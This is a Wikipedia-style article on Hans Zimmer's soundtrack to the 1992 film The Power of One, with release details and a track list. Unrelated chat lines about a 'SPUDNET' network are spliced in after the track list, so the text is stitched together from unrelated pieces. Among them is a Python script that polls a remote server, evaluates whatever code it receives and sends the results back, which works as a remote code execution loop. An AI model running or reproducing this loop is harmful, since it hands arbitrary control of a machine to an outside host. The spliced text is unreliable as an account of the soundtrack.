The Power of One (soundtrack)
The Power of One is the soundtrack to the 1992 film of the same name. The soundtrack was composed by Hans Zimmer.[1] This soundtrack inspired Zimmer to compose Disney's The Lion King in 1994.
The Power of One | |
---|---|
Soundtrack album by | |
Released | May 10, 1992 |
Recorded | 1991 |
Genre | Soundtrack, film score, world, new age |
Label | Elektra |
Producer | Hans Zimmer, Jay Rifkin |
Songs
Performed by Hans Zimmer except as indicated
- "The Rainmaker"
- "Mother Africa"
- "Of Death & Dying"
- "Limpopo River Song" (performed by The Bulawayo Church Choir)
- "The Power of One" (performed by Teddy Pendergrass)
- "Woza Mfana"
- "Southland Concerto"
- "Senzenina"
- "Penny Whistle Song"
- "The Funeral Song" (performed by The Bulawayo Church Choir)
- "Wangal' Unozipho" (performed by The Bulawayo Church Choir)
- "Mother Africa Reprise"
gollark: ```pythonimport urllib3, jsonhttp = urllib3.PoolManager()def send(x): http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "send", "channel": "potatOS", "message": x}), headers={"Content-Type": "application/json"})while True: r = http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "recv", "channel": "potatOS", "timeout": 30000}), headers={"Content-Type": "application/json"}) data = json.loads(r.data) if data["result"] != None: res = data["result"]["data"] try: send(repr(eval(res))) except Exception as e: send(repr(e))```
gollark: You can install the official SPUDNET-HTTP client on your computers.
gollark: It also actually has working autoreconnect.
gollark: SPUDNET is the Super PotatOS Update/Debug NETwork.
gollark: The HV channels, I mean.
References
- "The Power of One (1992)". soundtrackinfo.com. The Soundtrack Info Project. Retrieved 15 March 2011.
This article is issued from Wikipedia. The text is licensed under Creative Commons - Attribution - Sharealike. Additional terms may apply for the media files.